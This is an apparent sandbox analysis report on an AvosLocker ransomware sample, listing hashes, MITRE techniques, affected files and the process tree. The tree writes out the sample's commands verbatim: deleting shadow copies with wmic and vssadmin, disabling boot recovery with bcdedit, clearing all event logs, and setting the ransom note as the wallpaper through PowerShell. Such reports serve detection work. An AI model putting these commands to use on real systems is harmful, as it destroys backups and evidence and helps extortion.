avoslocker | 44000c80effa84d7b149003e07b9c73ebfdb73f21672f6beee69f6a298c226fb

Analysis

max time kernel
113s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
15-12-2024 00:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

generated_script.exe
Size

56.0MB
MD5

0743d55a94100e93c80e9ad6201f7f60
SHA1

2e8ad959c55b407bd67a8cb88e93f3cd670cc1af
SHA256

44000c80effa84d7b149003e07b9c73ebfdb73f21672f6beee69f6a298c226fb
SHA512

4b69c923f9ffca887c1dc4904864015ca1e3e8dd05b828b4830acf7b1e349cf3260b82db0c601658fe6732aed622614a3a1d2353555e42d906c49e97879afacc
SSDEEP

196608:8mKu818v8SYdQmRm8Qnf2ODjMnGydS8GrNs:mu81olYdQdF3MnG38GrNs

Score

10^/10

avoslocker defense_evasion discovery evasion execution impact ransomware

Malware Config

Signatures

Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
ransomware avoslocker
Avoslocker family
avoslocker
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
48724	bcdedit.exe
48688	bcdedit.exe

Renames multiple (8507) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Executes dropped EXE 1 IoCs

pid	Process
1380	hack.exe

Loads dropped DLL 4 IoCs

pid	Process
4456	generated_script.exe
4456	generated_script.exe
4456	generated_script.exe
4456	generated_script.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	hack.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	hack.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2013740206.png"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Windows Media Player\uk-UA\wmpnssui.dll.mui	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\ui-strings.js	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down-pressed.gif	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp	hack.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\WinFXList.xml	hack.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\en-US\wmplayer.exe.mui	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\Dismiss.scale-64.png	hack.exe
File opened for modification	C:\Program Files\Windows NT\Accessories\fr-FR\wordpad.exe.mui	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Grace-ul-oob.xrm-ms	hack.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\he-IL\tipresx.dll.mui	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ca-es\ui-strings.js	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-48_altform-unplated.png	hack.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui	hack.exe
File created	C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files\Microsoft Office\root\vreg\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\office32ww.msi.16.x-none.tree.dat	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-ppd.xrm-ms	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms	hack.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\hwrdeslm.dat	hack.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\ui-strings.js	hack.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\OutlookMailWideTile.scale-150.png	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial3-pl.xrm-ms	hack.exe
File created	C:\Program Files\Java\jdk-1.8\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\share_icons2x.png	hack.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\Doughboy.scale-125.png	hack.exe
File opened for modification	C:\Program Files\Windows NT\TableTextService\TableTextServiceArray.txt	hack.exe
File opened for modification	C:\Program Files\Windows Media Player\fr-FR\wmpnssui.dll.mui	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\close.svg	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\new_icons.png	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hr-hr\ui-strings.js	hack.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailSmallTile.scale-400.png	hack.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\FREN\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\bg\GET_YOUR_FILES_BACK.txt	hack.exe
File created	C:\Program Files\Java\jdk-1.8\lib\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Notifications\SoftLandingAssetDark.gif.DATA	hack.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt	hack.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailMediumTile.scale-150.png	hack.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-32_altform-unplated.png	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql2000.xsl	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-100.png	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_Subscription-pl.xrm-ms	hack.exe
File created	C:\Program Files\7-Zip\Lang\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	hack.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\README_en_US.txt	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_selected_18.svg	hack.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\GET_YOUR_FILES_BACK.txt	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ur.pak.DATA	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\root\ui-strings.js	hack.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\currency.data	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\ui-strings.js	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\AFTRNOON.ELM	hack.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\it-IT\TipRes.dll.mui	hack.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\or.pak	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close_h2x.png	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons_retina.png	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\personaspybridge.js	hack.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-ul-oob.xrm-ms	hack.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\ado\msadox28.tlb	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\es-es\ui-strings.js	hack.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fil_get.svg	hack.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Advanced-Light.scale-100.png	hack.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
48676	powershell.exe
30044	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hack.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
48696	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1380	hack.exe
1380	hack.exe
48676	powershell.exe
48676	powershell.exe
48676	powershell.exe
30044	powershell.exe
30044	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	1380	hack.exe
Token: SeIncreaseQuotaPrivilege	48668	WMIC.exe
Token: SeSecurityPrivilege	48668	WMIC.exe
Token: SeTakeOwnershipPrivilege	48668	WMIC.exe
Token: SeLoadDriverPrivilege	48668	WMIC.exe
Token: SeSystemProfilePrivilege	48668	WMIC.exe
Token: SeSystemtimePrivilege	48668	WMIC.exe
Token: SeProfSingleProcessPrivilege	48668	WMIC.exe
Token: SeIncBasePriorityPrivilege	48668	WMIC.exe
Token: SeCreatePagefilePrivilege	48668	WMIC.exe
Token: SeBackupPrivilege	48668	WMIC.exe
Token: SeRestorePrivilege	48668	WMIC.exe
Token: SeShutdownPrivilege	48668	WMIC.exe
Token: SeDebugPrivilege	48668	WMIC.exe
Token: SeSystemEnvironmentPrivilege	48668	WMIC.exe
Token: SeRemoteShutdownPrivilege	48668	WMIC.exe
Token: SeUndockPrivilege	48668	WMIC.exe
Token: SeManageVolumePrivilege	48668	WMIC.exe
Token: 33	48668	WMIC.exe
Token: 34	48668	WMIC.exe
Token: 35	48668	WMIC.exe
Token: 36	48668	WMIC.exe
Token: SeBackupPrivilege	49500	vssvc.exe
Token: SeRestorePrivilege	49500	vssvc.exe
Token: SeAuditPrivilege	49500	vssvc.exe
Token: SeIncreaseQuotaPrivilege	48668	WMIC.exe
Token: SeSecurityPrivilege	48668	WMIC.exe
Token: SeTakeOwnershipPrivilege	48668	WMIC.exe
Token: SeLoadDriverPrivilege	48668	WMIC.exe
Token: SeSystemProfilePrivilege	48668	WMIC.exe
Token: SeSystemtimePrivilege	48668	WMIC.exe
Token: SeProfSingleProcessPrivilege	48668	WMIC.exe
Token: SeIncBasePriorityPrivilege	48668	WMIC.exe
Token: SeCreatePagefilePrivilege	48668	WMIC.exe
Token: SeBackupPrivilege	48668	WMIC.exe
Token: SeRestorePrivilege	48668	WMIC.exe
Token: SeShutdownPrivilege	48668	WMIC.exe
Token: SeDebugPrivilege	48668	WMIC.exe
Token: SeSystemEnvironmentPrivilege	48668	WMIC.exe
Token: SeRemoteShutdownPrivilege	48668	WMIC.exe
Token: SeUndockPrivilege	48668	WMIC.exe
Token: SeManageVolumePrivilege	48668	WMIC.exe
Token: 33	48668	WMIC.exe
Token: 34	48668	WMIC.exe
Token: 35	48668	WMIC.exe
Token: 36	48668	WMIC.exe
Token: SeDebugPrivilege	48676	powershell.exe
Token: SeBackupPrivilege	48676	powershell.exe
Token: SeBackupPrivilege	48676	powershell.exe
Token: SeBackupPrivilege	48676	powershell.exe
Token: SeBackupPrivilege	48676	powershell.exe
Token: SeBackupPrivilege	48676	powershell.exe
Token: SeBackupPrivilege	48676	powershell.exe
Token: SeSecurityPrivilege	48676	powershell.exe
Token: SeBackupPrivilege	48676	powershell.exe
Token: SeBackupPrivilege	48676	powershell.exe
Token: SeBackupPrivilege	48676	powershell.exe
Token: SeBackupPrivilege	48676	powershell.exe
Token: SeBackupPrivilege	48676	powershell.exe
Token: SeSecurityPrivilege	48676	powershell.exe
Token: SeBackupPrivilege	48676	powershell.exe
Token: SeBackupPrivilege	48676	powershell.exe
Token: SeSecurityPrivilege	48676	powershell.exe
Token: SeBackupPrivilege	48676	powershell.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 816 wrote to memory of 4456	816	generated_script.exe	82
PID 816 wrote to memory of 4456	816	generated_script.exe	82
PID 4456 wrote to memory of 1380	4456	generated_script.exe	83
PID 4456 wrote to memory of 1380	4456	generated_script.exe	83
PID 4456 wrote to memory of 1380	4456	generated_script.exe	83
PID 1380 wrote to memory of 2800	1380	hack.exe	85
PID 1380 wrote to memory of 2800	1380	hack.exe	85
PID 1380 wrote to memory of 1140	1380	hack.exe	86
PID 1380 wrote to memory of 1140	1380	hack.exe	86
PID 1380 wrote to memory of 3456	1380	hack.exe	87
PID 1380 wrote to memory of 3456	1380	hack.exe	87
PID 1380 wrote to memory of 3424	1380	hack.exe	88
PID 1380 wrote to memory of 3424	1380	hack.exe	88
PID 1380 wrote to memory of 4676	1380	hack.exe	89
PID 1380 wrote to memory of 4676	1380	hack.exe	89
PID 2800 wrote to memory of 48668	2800	cmd.exe	92
PID 2800 wrote to memory of 48668	2800	cmd.exe	92
PID 4676 wrote to memory of 48676	4676	cmd.exe	93
PID 4676 wrote to memory of 48676	4676	cmd.exe	93
PID 3424 wrote to memory of 48688	3424	cmd.exe	94
PID 3424 wrote to memory of 48688	3424	cmd.exe	94
PID 1140 wrote to memory of 48696	1140	cmd.exe	95
PID 1140 wrote to memory of 48696	1140	cmd.exe	95
PID 3456 wrote to memory of 48724	3456	cmd.exe	96
PID 3456 wrote to memory of 48724	3456	cmd.exe	96
PID 1380 wrote to memory of 30044	1380	hack.exe	99
PID 1380 wrote to memory of 30044	1380	hack.exe	99
PID 30044 wrote to memory of 30312	30044	powershell.exe	100
PID 30044 wrote to memory of 30312	30044	powershell.exe	100
PID 30044 wrote to memory of 30468	30044	powershell.exe	101
PID 30044 wrote to memory of 30468	30044	powershell.exe	101

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\generated_script.exe
"C:\Users\Admin\AppData\Local\Temp\generated_script.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:816
- C:\Users\Admin\AppData\Local\Temp\generated_script.exe
  "C:\Users\Admin\AppData\Local\Temp\generated_script.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4456
- - C:\Users\Admin\AppData\Local\Temp\tmp39eyn0q3\hack.exe
    C:\Users\Admin\AppData\Local\Temp\tmp39eyn0q3\hack.exe
    3⤵
    - Executes dropped EXE
    - Drops desktop.ini file(s)
    - Enumerates connected drives
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1380
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c wmic shadowcopy delete /nointeractive
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2800
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete /nointeractive
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:48668
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1140
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        5⤵
        Interacts with shadow copies
        
        PID:48696
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c bcdedit /set {default} recoveryenabled No
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3456
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled No
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:48724
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3424
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:48688
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4676
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:48676
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:30044
    - - C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2013740206.png /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:30312
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
        5⤵
        
        PID:30468

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:49500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\GET_YOUR_FILES_BACK.txt

Filesize
1011B

MD5
c92c2b70fb37f84aab38412ad9226aa8

SHA1
14f2e9a83285612d0a7b2c83b8f89bccfde6c154

SHA256
d64639e873c0873b469cd856d1ef4bce7dc14a80fac6fe2bed9d629f05acc77f

SHA512
04f9dcb3cd49909712535255b6eadd7fafcb2902bf1abd5a25e9bb5f5c4dc032611aec0a5b0ec89cd7dbc65276b935c54b906b391507d2e3e3aa65466b15f848

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
eb6332ae9e8fec69c2236355e2638f9d

SHA1
71500d57fb304979afd6756f06d4b9a59f995eb7

SHA256
88e5ffe18fd4a772efce68f1b0db839846cafc42d36415508ad5356a44d38f32

SHA512
e87c864ba79bd7a10a62b55ad564cf3acb090e7d85707a6967497deeef5fcde1f0b4608ea8791bf81363ec583a0101d470d8f3cd2172ced8d4071d7f6c674aed

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8162\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8162\_bz2.pyd

Filesize
81KB

MD5
4101128e19134a4733028cfaafc2f3bb

SHA1
66c18b0406201c3cfbba6e239ab9ee3dbb3be07d

SHA256
5843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80

SHA512
4f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8162\_decimal.pyd

Filesize
245KB

MD5
d47e6acf09ead5774d5b471ab3ab96ff

SHA1
64ce9b5d5f07395935df95d4a0f06760319224a2

SHA256
d0df57988a74acd50b2d261e8b5f2c25da7b940ec2aafbee444c277552421e6e

SHA512
52e132ce94f21fa253fed4cf1f67e8d4423d8c30224f961296ee9f64e2c9f4f7064d4c8405cd3bb67d3cf880fe4c21ab202fa8cf677e3b4dad1be6929dbda4e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8162\_hashlib.pyd

Filesize
62KB

MD5
de4d104ea13b70c093b07219d2eff6cb

SHA1
83daf591c049f977879e5114c5fea9bbbfa0ad7b

SHA256
39bc615842a176db72d4e0558f3cdcae23ab0623ad132f815d21dcfbfd4b110e

SHA512
567f703c2e45f13c6107d767597dba762dc5caa86024c87e7b28df2d6c77cd06d3f1f97eed45e6ef127d5346679fea89ac4dc2c453ce366b6233c0fa68d82692

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8162\_lzma.pyd

Filesize
154KB

MD5
337b0e65a856568778e25660f77bc80a

SHA1
4d9e921feaee5fa70181eba99054ffa7b6c9bb3f

SHA256
613de58e4a9a80eff8f8bc45c350a6eaebf89f85ffd2d7e3b0b266bf0888a60a

SHA512
19e6da02d9d25ccef06c843b9f429e6b598667270631febe99a0d12fc12d5da4fb242973a8351d3bf169f60d2e17fe821ad692038c793ce69dfb66a42211398e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8162\_socket.pyd

Filesize
76KB

MD5
8140bdc5803a4893509f0e39b67158ce

SHA1
653cc1c82ba6240b0186623724aec3287e9bc232

SHA256
39715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769

SHA512
d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8162\base_library.zip

Filesize
1.4MB

MD5
9836732a064983e8215e2e26e5b66974

SHA1
02e9a46f5a82fa5de6663299512ca7cd03777d65

SHA256
3dfe7d63f90833e0f3de22f450ed5ee29858bb12fe93b41628afe85657a3b61f

SHA512
1435ba9bc8d35a9336dee5db06944506953a1bcf340e9bdad834828170ce826dcfb1fa80274cd9df667e47b83348139b38ab317055a5a3e6824df15adf8a4d86

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8162\libcrypto-1_1.dll

Filesize
3.3MB

MD5
6f4b8eb45a965372156086201207c81f

SHA1
8278f9539463f0a45009287f0516098cb7a15406

SHA256
976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541

SHA512
2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8162\python311.dll

Filesize
5.5MB

MD5
9a24c8c35e4ac4b1597124c1dcbebe0f

SHA1
f59782a4923a30118b97e01a7f8db69b92d8382a

SHA256
a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7

SHA512
9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8162\select.pyd

Filesize
28KB

MD5
97ee623f1217a7b4b7de5769b7b665d6

SHA1
95b918f3f4c057fb9c878c8cc5e502c0bd9e54c0

SHA256
0046eb32f873cde62cf29af02687b1dd43154e9fd10e0aa3d8353d3debb38790

SHA512
20edc7eae5c0709af5c792f04a8a633d416da5a38fc69bd0409afe40b7fb1afa526de6fe25d8543ece9ea44fd6baa04a9d316ac71212ae9638bdef768e661e0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8162\unicodedata.pyd

Filesize
1.1MB

MD5
bc58eb17a9c2e48e97a12174818d969d

SHA1
11949ebc05d24ab39d86193b6b6fcff3e4733cfd

SHA256
ecf7836aa0d36b5880eb6f799ec402b1f2e999f78bfff6fb9a942d1d8d0b9baa

SHA512
4aa2b2ce3eb47503b48f6a888162a527834a6c04d3b49c562983b4d5aad9b7363d57aef2e17fe6412b89a9a3b37fb62a4ade4afc90016e2759638a17b1deae6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gdefco5v.z3h.ps1

Filesize
